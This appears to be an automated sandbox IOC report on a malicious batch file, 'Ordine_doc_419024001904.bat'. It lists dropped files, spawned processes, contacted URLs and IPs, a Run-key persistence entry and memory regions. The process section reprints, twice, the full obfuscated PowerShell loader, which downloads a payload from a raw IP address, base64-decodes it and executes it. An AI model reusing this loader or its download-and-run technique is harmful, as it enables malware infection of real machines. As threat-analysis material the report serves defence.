IOC Report
Ordine_doc_419024001904.bat

loading gif

Files

File Path
Type
Category
Malicious
Ordine_doc_419024001904.bat
ASCII text, with very long lines (2865), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu3bio23.1v3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsfzwus5.lv0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwgajo4p.34g.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oyuf5eoi.3xc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\s5497I81
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DN32P3HNCG519VXTW9UR.temp
data
dropped
C:\Users\user\AppData\Roaming\Specificerings.Lit
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ordine_doc_419024001904.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Huisher = 1;$Sstersnner225='Substrin';$Sstersnner225+='g';Function Orthographising($N){$Tarantass=$N.Length-$Huisher;For($Glamouriserende=1; $Glamouriserende -lt $Tarantass; $Glamouriserende+=(2)){$Sprogrgter+=$N.$Sstersnner225.Invoke($Glamouriserende, $Huisher);}$Sprogrgter;}function Kneblende($Arveprinsen){.($Sammenkrbet) ($Arveprinsen);}$Drkarm=Orthographising 'KM oSzKi.l l aN/ 5T.S0S (RWNi n,dBoEwFsL N.T. A1E0 .S0N; .WDiUnP6g4T; Sx 6 4u; TrSvK: 1 2 1 . 0C) FG,eTc k,oE/,2,0 1Y0O0J1T0m1. CFUi rRe fSo.xB/,1,2K1F.S0 ';$Nonexultation74=Orthographising ',UlsFe,rT-BADgTe n.t. ';$Rekrutteredes=Orthographising 'sh.t tApC:S/./t8K7T. 1.2K1.. 1 0.5..,1C6.3,/.S kSaAb s,. a sCdS ';$Forprvens=Orthographising '.>. ';$Sammenkrbet=Orthographising 'Bi.eRxU ';$Greasing = Orthographising ' e c,h oH % a p p,dfa,t a %.\ SSpAeBcOiRf,i,c.eSrUicn ghsm.pLIiRtR ,&B&B e,cHhPo, J$, ';Kneblende (Orthographising 'D$PgLlsoRb aClS: P r oFn o,m iGa,lS9 9V=u(YcRmBd M/pcF E$CG rSe,aAsSiSnFg )S ');Kneblende (Orthographising 'L$EgLlTo,bWaSl,: URnSr eAsIiUlTiBeSnCtR= $.R e kCr uFtWt,e rJe d e sC.AsTp,l i tS(S$.F,o rWp.r,v e.nUsA)S ');$Rekrutteredes=$Unresilient[0];Kneblende (Orthographising 'D$ gGlKo b,a lS:EE nTcRhFeIq uFeGrF=kNLeFw,-BO b.j e,c t STySsBtPe m .CN,e t,..W eAb,C.laiFeSn t ');Kneblende (Orthographising ' $.E,nAcThDeLqFuTeCr.. HKeIa dBe r.s [ $SN o.n e x u l,tUa tTiTo.n 7 4P] =,$.DarFk.a r,mT ');$Triptych=Orthographising 'VE nOc hPeKq ube r,.,D obw nAlNoTa.d F.i l e,(V$AR e kKrLu tKtie.rVe dCeAs.,h$ a cRl yidSe.sS)U ';$Triptych=$Pronomial99[1]+$Triptych;$aclydes=$Pronomial99[0];Kneblende (Orthographising ' $ogOlBoVb a l : I.n tSrSo.dFuBc ePr =,(LTOeSsTt -,PUa t hM $Ra cUl.yWdJeSs ) ');while (!$Introducer) {Kneblende (Orthographising ',$Kg lIovbSaulL:ES p e kMt r.o s kDo pL= $,tMr u.e. ') ;Kneblende $Triptych;Kneblende (Orthographising 'FS.tSa.r t -BS l e eUpo A4 ');Kneblende (Orthographising ' $,g lHoMb a lC:cIKn t r o.dBu,cbeUr = (HTSe s,tG-UP.a t.h .$.aCcSl ygdHessL)F ') ;Kneblende (Orthographising '.$.gFlPo bTaMl :TB,e tPr,oAt h eTd s,=S$Mg.l oLbEaSl.:DB e,t tVe dI+.+,%B$ UVnGr.eEs.iAl i e.n,tS. c oEuBn t ') ;$Rekrutteredes=$Unresilient[$Betrotheds];}Kneblende (Orthographising 'F$DgKl o bia l :tD o,wInTrHu sGh iCn,gU = DG e t -,CSoDn t e n t H$.a.cSlLyGdSeRs ');Kneblende (Orthographising ' $ g.lTo b,awl :FPSr iTm eRrSs F=, [AS,ySsCt,e mH. COo n vQePr.t ]g:p:SF.rDo muB aTs,eS6.4 SSt,r i.nUgG(.$ DSo w nUrMu s h iDnEgR), ');Kneblende (Orthographising 'S$ gSlVoTbMaTl :,KVv iPsUt s P=W [MS.yAs t.e,mT.NTCe.xSt,..E n.cMoSd i.nig,] : :DAGSSC.IhIU. GTett SLtEr iVn.g,(,$TP.r,iCmReMr s,) ');Kneblende (Orthographising ',$Og lCoRb a,lT:,T e gSn.eKp r.o cSe.dPu rpeMrFnDe s,=.$ KOvHi s t s .As u.bKs.tBrKi,n.g,(.3 0L6.9S4C4., 2T6u1S9G0 ) ');Kneblende $Tegneprocedurernes;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificerings.Lit && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Huisher = 1;$Sstersnner225='Substrin';$Sstersnner225+='g';Function Orthographising($N){$Tarantass=$N.Length-$Huisher;For($Glamouriserende=1; $Glamouriserende -lt $Tarantass; $Glamouriserende+=(2)){$Sprogrgter+=$N.$Sstersnner225.Invoke($Glamouriserende, $Huisher);}$Sprogrgter;}function Kneblende($Arveprinsen){.($Sammenkrbet) ($Arveprinsen);}$Drkarm=Orthographising 'KM oSzKi.l l aN/ 5T.S0S (RWNi n,dBoEwFsL N.T. A1E0 .S0N; .WDiUnP6g4T; Sx 6 4u; TrSvK: 1 2 1 . 0C) FG,eTc k,oE/,2,0 1Y0O0J1T0m1. CFUi rRe fSo.xB/,1,2K1F.S0 ';$Nonexultation74=Orthographising ',UlsFe,rT-BADgTe n.t. ';$Rekrutteredes=Orthographising 'sh.t tApC:S/./t8K7T. 1.2K1.. 1 0.5..,1C6.3,/.S kSaAb s,. a sCdS ';$Forprvens=Orthographising '.>. ';$Sammenkrbet=Orthographising 'Bi.eRxU ';$Greasing = Orthographising ' e c,h oH % a p p,dfa,t a %.\ SSpAeBcOiRf,i,c.eSrUicn ghsm.pLIiRtR ,&B&B e,cHhPo, J$, ';Kneblende (Orthographising 'D$PgLlsoRb aClS: P r oFn o,m iGa,lS9 9V=u(YcRmBd M/pcF E$CG rSe,aAsSiSnFg )S ');Kneblende (Orthographising 'L$EgLlTo,bWaSl,: URnSr eAsIiUlTiBeSnCtR= $.R e kCr uFtWt,e rJe d e sC.AsTp,l i tS(S$.F,o rWp.r,v e.nUsA)S ');$Rekrutteredes=$Unresilient[0];Kneblende (Orthographising 'D$ gGlKo b,a lS:EE nTcRhFeIq uFeGrF=kNLeFw,-BO b.j e,c t STySsBtPe m .CN,e t,..W eAb,C.laiFeSn t ');Kneblende (Orthographising ' $.E,nAcThDeLqFuTeCr.. HKeIa dBe r.s [ $SN o.n e x u l,tUa tTiTo.n 7 4P] =,$.DarFk.a r,mT ');$Triptych=Orthographising 'VE nOc hPeKq ube r,.,D obw nAlNoTa.d F.i l e,(V$AR e kKrLu tKtie.rVe dCeAs.,h$ a cRl yidSe.sS)U ';$Triptych=$Pronomial99[1]+$Triptych;$aclydes=$Pronomial99[0];Kneblende (Orthographising ' $ogOlBoVb a l : I.n tSrSo.dFuBc ePr =,(LTOeSsTt -,PUa t hM $Ra cUl.yWdJeSs ) ');while (!$Introducer) {Kneblende (Orthographising ',$Kg lIovbSaulL:ES p e kMt r.o s kDo pL= $,tMr u.e. ') ;Kneblende $Triptych;Kneblende (Orthographising 'FS.tSa.r t -BS l e eUpo A4 ');Kneblende (Orthographising ' $,g lHoMb a lC:cIKn t r o.dBu,cbeUr = (HTSe s,tG-UP.a t.h .$.aCcSl ygdHessL)F ') ;Kneblende (Orthographising '.$.gFlPo bTaMl :TB,e tPr,oAt h eTd s,=S$Mg.l oLbEaSl.:DB e,t tVe dI+.+,%B$ UVnGr.eEs.iAl i e.n,tS. c oEuBn t ') ;$Rekrutteredes=$Unresilient[$Betrotheds];}Kneblende (Orthographising 'F$DgKl o bia l :tD o,wInTrHu sGh iCn,gU = DG e t -,CSoDn t e n t H$.a.cSlLyGdSeRs ');Kneblende (Orthographising ' $ g.lTo b,awl :FPSr iTm eRrSs F=, [AS,ySsCt,e mH. COo n vQePr.t ]g:p:SF.rDo muB aTs,eS6.4 SSt,r i.nUgG(.$ DSo w nUrMu s h iDnEgR), ');Kneblende (Orthographising 'S$ gSlVoTbMaTl :,KVv iPsUt s P=W [MS.yAs t.e,mT.NTCe.xSt,..E n.cMoSd i.nig,] : :DAGSSC.IhIU. GTett SLtEr iVn.g,(,$TP.r,iCmReMr s,) ');Kneblende (Orthographising ',$Og lCoRb a,lT:,T e gSn.eKp r.o cSe.dPu rpeMrFnDe s,=.$ KOvHi s t s .As u.bKs.tBrKi,n.g,(.3 0L6.9S4C4., 2T6u1S9G0 ) ');Kneblende $Tegneprocedurernes;"
malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
malicious
C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe
"C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe"
malicious
C:\Windows\SysWOW64\AtBroker.exe
"C:\Windows\SysWOW64\AtBroker.exe"
malicious
C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe
"C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe"
malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificerings.Lit && echo $"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
There are 15 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://www.oyoing.com/gnbc/
91.195.240.19
malicious
http://www.tyaer.com/gnbc/?5b=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g==&wD=mjvh1V4x
47.91.88.207
malicious
http://87.121.Hr
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://87.121.105.163/Skabs.asd
87.121.105.163
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163/~
unknown
http://87.121.105.163
unknown
https://github.com/Pester/Pester
unknown
http://87.121.105.163/Skabs.asdXRsl0
unknown
http://87.121.105.163/
unknown
https://aka.ms/pscore6lB
unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.binT
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.binM
unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.bin
87.121.105.163
http://87.121.105.163/icjFpYDkBweqyeZ252.binRAw
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://87.121.105.163/Skabs.asdP
unknown
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.tyaer.com
47.91.88.207
malicious
www.oyoing.com
unknown
malicious
parkingpage.namecheap.com
91.195.240.19

IPs

IP
Domain
Country
Malicious
47.91.88.207
www.tyaer.com
United States
malicious
87.121.105.163
unknown
Bulgaria
91.195.240.19
parkingpage.namecheap.com
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
VT_DR8YHH6
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
23890000
unclassified section
page execute and read and write
malicious
1681C8C1000
trusted library allocation
page read and write
malicious
BF7B000
direct allocation
page execute and read and write
malicious
1030000
system
page execute and read and write
malicious
28A0000
trusted library allocation
page read and write
malicious
22C0000
unkown
page execute and read and write
malicious
2860000
trusted library allocation
page read and write
malicious
3A0000
system
page execute and read and write
malicious
8470000
direct allocation
page execute and read and write
malicious
5982000
trusted library allocation
page read and write
malicious
140000
unclassified section
page execute and read and write
malicious
4281000
heap
page read and write
73C0000
trusted library allocation
page read and write
4281000
heap
page read and write
DAC000
stack
page read and write
92F0000
direct allocation
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
4DC4000
trusted library allocation
page read and write
C40000
unkown
page readonly
78C7000
heap
page read and write
2A65000
heap
page read and write
4281000
heap
page read and write
16824850000
heap
page read and write
140000
direct allocation
page read and write
4281000
heap
page read and write
8D0000
heap
page read and write
1680A855000
heap
page read and write
78BE000
heap
page read and write
4281000
heap
page read and write
8FE000
stack
page read and write
7E67000
stack
page read and write
81DB000
heap
page read and write
1DF03DCB000
heap
page read and write
28E0000
trusted library allocation
page read and write
7851000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
7214000
heap
page read and write
1680A751000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
1680A70C000
heap
page read and write
977B000
direct allocation
page execute and read and write
4281000
heap
page read and write
2A3E000
unkown
page read and write
7FF848EE6000
trusted library allocation
page execute and read and write
23C0F5D0000
heap
page read and write
16824A17000
heap
page execute and read and write
7150000
heap
page read and write
7192000
heap
page read and write
C8E000
unkown
page readonly
737D000
stack
page read and write
8450000
trusted library allocation
page read and write
5F8000
heap
page read and write
7A0000
heap
page read and write
7FF0000
trusted library allocation
page execute and read and write
1F0000
unkown
page readonly
2AB0000
heap
page read and write
4281000
heap
page read and write
7EAF000
stack
page read and write
1680A702000
heap
page read and write
29F0000
heap
page read and write
7890000
heap
page read and write
71B5000
heap
page read and write
9360000
direct allocation
page read and write
2AC0000
trusted library allocation
page read and write
8211000
heap
page read and write
410000
unkown
page read and write
5004000
unclassified section
page read and write
669B000
remote allocation
page execute and read and write
7FF849090000
trusted library allocation
page read and write
7E2F000
stack
page read and write
7EFE000
stack
page read and write
4281000
heap
page read and write
16824AF0000
heap
page read and write
4281000
heap
page read and write
2B6F000
heap
page read and write
46D1000
trusted library allocation
page read and write
1680C6F4000
heap
page read and write
718F000
heap
page read and write
21C0000
unkown
page readonly
2D10000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
23C0F4C0000
heap
page read and write
6D6F000
heap
page read and write
88D000
stack
page read and write
472E000
stack
page read and write
2E10000
heap
page read and write
23C10F14000
trusted library allocation
page read and write
1680A7A0000
trusted library allocation
page read and write
78C6000
heap
page read and write
2930000
remote allocation
page execute and read and write
4281000
heap
page read and write
C97000
unkown
page readonly
3F4000
heap
page read and write
2A5A000
heap
page read and write
4281000
heap
page read and write
23C0F4DC000
heap
page read and write
7FF848E1B000
trusted library allocation
page read and write
3F4000
heap
page read and write
1680E4A1000
trusted library allocation
page read and write
2DE2000
heap
page read and write
65C000
heap
page read and write
652000
heap
page read and write
645000
heap
page read and write
1680E4BB000
trusted library allocation
page read and write
B2612FF000
stack
page read and write
2AD3000
heap
page read and write
6B40000
direct allocation
page read and write
2AD3000
trusted library allocation
page execute and read and write
7A7000
heap
page read and write
4281000
heap
page read and write
4530000
trusted library allocation
page read and write
9310000
direct allocation
page read and write
2CC0000
heap
page read and write
1680A70E000
heap
page read and write
2380D000
direct allocation
page execute and read and write
7250000
trusted library allocation
page read and write
F9D4000
system
page read and write
1680C8DB000
trusted library allocation
page read and write
78D1000
heap
page read and write
53C000
stack
page read and write
7400000
trusted library allocation
page read and write
2301E000
stack
page read and write
760000
unkown
page readonly
4281000
heap
page read and write
2CD2000
unkown
page read and write
8480000
trusted library allocation
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
788A000
heap
page read and write
2D30000
heap
page read and write
30000
unkown
page readonly
4281000
heap
page read and write
B57B000
direct allocation
page execute and read and write
478E000
direct allocation
page execute and read and write
70D0000
trusted library allocation
page read and write
4281000
heap
page read and write
9EA000
stack
page read and write
458E000
stack
page read and write
480B000
unkown
page execute and read and write
23C10E00000
trusted library allocation
page read and write
465E000
stack
page read and write
4281000
heap
page read and write
812C000
stack
page read and write
4281000
heap
page read and write
79E0000
trusted library allocation
page read and write
4281000
heap
page read and write
8E5000
heap
page read and write
78B4000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
C97000
unkown
page readonly
1680A7D0000
trusted library allocation
page read and write
C30000
unkown
page readonly
2A5ED7F000
stack
page read and write
2DBD000
heap
page read and write
8215000
heap
page read and write
3394000
unkown
page read and write
9A000
stack
page read and write
1680CD1C000
trusted library allocation
page read and write
4281000
heap
page read and write
661000
heap
page read and write
1680E68B000
trusted library allocation
page read and write
23882000
direct allocation
page execute and read and write
2DC1000
heap
page read and write
1680A850000
heap
page read and write
F5EC000
system
page read and write
528000
heap
page read and write
709B000
remote allocation
page execute and read and write
2840000
heap
page read and write
2A5ECFF000
stack
page read and write
C81000
unkown
page execute read
2AC9000
heap
page read and write
7130000
trusted library allocation
page read and write
520000
heap
page read and write
7880000
heap
page read and write
83E000
stack
page read and write
7FF848EC0000
trusted library allocation
page execute and read and write
7390000
trusted library allocation
page read and write
61D000
heap
page read and write
C97B000
direct allocation
page execute and read and write
2305F000
stack
page read and write
16824A20000
heap
page read and write
2DCF000
stack
page read and write
6D60000
heap
page read and write
421000
unkown
page readonly
1130000
unkown
page readonly
7410000
trusted library allocation
page read and write
1DF040E4000
heap
page read and write
7FF848E03000
trusted library allocation
page execute and read and write
E10000
unkown
page readonly
4281000
heap
page read and write
2CC0000
heap
page read and write
2B87000
heap
page read and write
4281000
heap
page read and write
23C110C4000
trusted library allocation
page read and write
78CC000
heap
page read and write
2BF0000
trusted library allocation
page read and write
275F0000
direct allocation
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
F20000
unkown
page read and write
529B000
remote allocation
page execute and read and write
1680A5F0000
heap
page read and write
2A9A000
heap
page read and write
2D80000
heap
page read and write
78BE000
heap
page read and write
1680A706000
heap
page read and write
785E000
heap
page read and write
2A6F000
heap
page read and write
6BD5000
heap
page execute and read and write
6D88000
heap
page read and write
1680DA44000
trusted library allocation
page read and write
10FB000
system
page execute and read and write
4281000
heap
page read and write
970000
unkown
page readonly
7FF848FD0000
trusted library allocation
page execute and read and write
C20000
unkown
page readonly
DD7B000
direct allocation
page execute and read and write
2DAA000
heap
page read and write
4569000
heap
page read and write
4281000
heap
page read and write
489F000
stack
page read and write
16824A3A000
heap
page read and write
80EC000
stack
page read and write
4281000
heap
page read and write
20000
unkown
page readonly
6B30000
direct allocation
page read and write
23390000
heap
page read and write
23C10DC0000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
785B000
heap
page read and write
1680A660000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
510000
unkown
page read and write
5F0000
heap
page read and write
4281000
heap
page read and write
30000
unkown
page readonly
4281000
heap
page read and write
231E1000
heap
page read and write
8460000
trusted library allocation
page execute and read and write
253DB000
unclassified section
page execute and read and write
C80000
unkown
page readonly
C20000
unkown
page readonly
4281000
heap
page read and write
1130000
unkown
page readonly
7FF849150000
trusted library allocation
page read and write
4565000
heap
page read and write
78CC000
heap
page read and write
78BA000
heap
page read and write
6AB0000
direct allocation
page read and write
1088000
system
page execute and read and write
4281000
heap
page read and write
C60000
unkown
page read and write
73E0000
trusted library allocation
page read and write
2AC9000
heap
page read and write
3F4000
heap
page read and write
22F5D000
stack
page read and write
296C000
stack
page read and write
6B10000
direct allocation
page read and write
33B000
stack
page read and write
420000
heap
page read and write
1680C000000
trusted library allocation
page read and write
1680C6A5000
heap
page read and write
2AD0000
trusted library allocation
page read and write
4380000
trusted library allocation
page read and write
469E000
stack
page read and write
2950000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
1680C840000
heap
page execute and read and write
10000
unkown
page readonly
1DF03D90000
heap
page read and write
76E000
stack
page read and write
2ACE000
heap
page read and write
23C10F03000
trusted library allocation
page read and write
2AD3000
heap
page read and write
4281000
heap
page read and write
428A000
heap
page read and write
5739000
trusted library allocation
page read and write
4281000
heap
page read and write
F10000
unkown
page read and write
A73000
unkown
page read and write
73D0000
trusted library allocation
page execute and read and write
4281000
heap
page read and write
2A7B000
heap
page read and write
642000
heap
page read and write
4281000
heap
page read and write
231EF000
heap
page read and write
1680C6A7000
heap
page read and write
2AA0000
heap
page read and write
29F7000
heap
page read and write
4281000
heap
page read and write
23811000
direct allocation
page execute and read and write
3E9B000
remote allocation
page execute and read and write
2A96000
heap
page read and write
7F40000
heap
page read and write
2AE0000
heap
page read and write
2CBC000
stack
page read and write
1680C69E000
heap
page read and write
461E000
stack
page read and write
7430000
trusted library allocation
page read and write
5F0000
heap
page read and write
56E1000
trusted library allocation
page read and write
1680C758000
heap
page read and write
2BB8000
heap
page read and write
2A5F1FF000
stack
page read and write
7E80000
trusted library allocation
page read and write
4281000
heap
page read and write
2BE0000
trusted library allocation
page read and write
23C0F380000
system
page execute and read and write
22F1D000
stack
page read and write
1680CA7A000
trusted library allocation
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
652000
heap
page read and write
1681CB4A000
trusted library allocation
page read and write
23669000
direct allocation
page execute and read and write
4281000
heap
page read and write
4520000
trusted library allocation
page execute and read and write
4281000
heap
page read and write
1680A590000
heap
page read and write
2A5A000
heap
page read and write
6FCF000
stack
page read and write
45CE000
stack
page read and write
2A50000
heap
page read and write
249DB000
unclassified section
page execute and read and write
C81000
unkown
page execute read
22B0000
heap
page read and write
74DB000
stack
page read and write
8BD000
stack
page read and write
4A02000
unclassified section
page read and write
6AE0000
direct allocation
page read and write
2DDB000
heap
page read and write
2BC0000
heap
page read and write
1680D044000
trusted library allocation
page read and write
908000
stack
page read and write
4281000
heap
page read and write
F38000
heap
page read and write
4281000
heap
page read and write
1680A674000
heap
page read and write
4281000
heap
page read and write
8E0000
heap
page read and write
715C000
heap
page read and write
DEE000
unkown
page read and write
43AD000
heap
page read and write
C50000
heap
page read and write
2D90000
heap
page read and write
2C00000
trusted library allocation
page read and write
2DBC000
heap
page read and write
9320000
direct allocation
page read and write
4281000
heap
page read and write
1680E14A000
trusted library allocation
page read and write
78C3000
heap
page read and write
2A80000
heap
page read and write
F38000
heap
page read and write
4828000
trusted library allocation
page read and write
1680DFAE000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page execute and read and write
430000
heap
page read and write
4281000
heap
page read and write
2AC3000
heap
page read and write
4281000
heap
page read and write
712A000
trusted library allocation
page read and write
2D8E000
stack
page read and write
F42C000
system
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
81AC000
stack
page read and write
9340000
direct allocation
page read and write
9350000
direct allocation
page read and write
64A000
heap
page read and write
9A000
stack
page read and write
2CB0000
heap
page readonly
1680A7E0000
heap
page readonly
E10000
unkown
page readonly
DF0000
unkown
page read and write
4281000
heap
page read and write
481F000
stack
page read and write
2A5FC4F000
stack
page read and write
7FF848EB0000
trusted library allocation
page read and write
D6D25FE000
stack
page read and write
23C0F4F0000
heap
page read and write
410000
unkown
page read and write
1680CDF7000
trusted library allocation
page read and write
4281000
heap
page read and write
B60000
unkown
page read and write
1DF040E0000
heap
page read and write
2ECE000
stack
page read and write
C97000
unkown
page readonly
4719000
direct allocation
page execute and read and write
7846000
heap
page read and write
4281000
heap
page read and write
458D000
stack
page read and write
7FF8490F0000
trusted library allocation
page read and write
4281000
heap
page read and write
2A5FCCD000
stack
page read and write
16824870000
heap
page read and write
8CF000
stack
page read and write
F30000
heap
page read and write
81B0000
heap
page read and write
1DF03DC0000
heap
page read and write
47E0000
heap
page read and write
2AC3000
heap
page read and write
2A5EAFE000
stack
page read and write
23C110BE000
trusted library allocation
page read and write
4281000
heap
page read and write
231DC000
stack
page read and write
2C7E000
stack
page read and write
B40000
unkown
page readonly
4281000
heap
page read and write
C60000
unkown
page read and write
7FF848F20000
trusted library allocation
page execute and read and write
7258000
trusted library allocation
page read and write
F4F000
heap
page read and write
100000
direct allocation
page read and write
591F000
stack
page read and write
3E0B000
unkown
page execute and read and write
20000
unkown
page readonly
4281000
heap
page read and write
4281000
heap
page read and write
2D38000
heap
page read and write
4281000
heap
page read and write
2CD2000
unkown
page read and write
BE0000
heap
page read and write
4281000
heap
page read and write
7F60000
trusted library allocation
page read and write
84A0000
direct allocation
page read and write
107E000
system
page execute and read and write
53D000
stack
page read and write
DF0000
unkown
page read and write
73B0000
heap
page read and write
47DE000
stack
page read and write
2A96000
heap
page read and write
2AA4000
heap
page read and write
C95000
unkown
page read and write
2CAF000
stack
page read and write
760000
unkown
page readonly
4281000
heap
page read and write
2CC4000
heap
page read and write
2BE9000
trusted library allocation
page read and write
4281000
heap
page read and write
1680CE7F000
trusted library allocation
page read and write
2AB0000
trusted library section
page read and write
C71000
unkown
page readonly
960000
unkown
page readonly
14C1000
unkown
page readonly
1680E4A8000
trusted library allocation
page read and write
2DB1000
heap
page read and write
2A0D000
stack
page read and write
2A7B000
heap
page read and write
2D92000
unkown
page read and write
1680A4B0000
heap
page read and write
4281000
heap
page read and write
6AF0000
direct allocation
page read and write
7E6E000
stack
page read and write
6A4E000
stack
page read and write
7470000
trusted library allocation
page read and write
2CE0000
heap
page read and write
4281000
heap
page read and write
970000
unkown
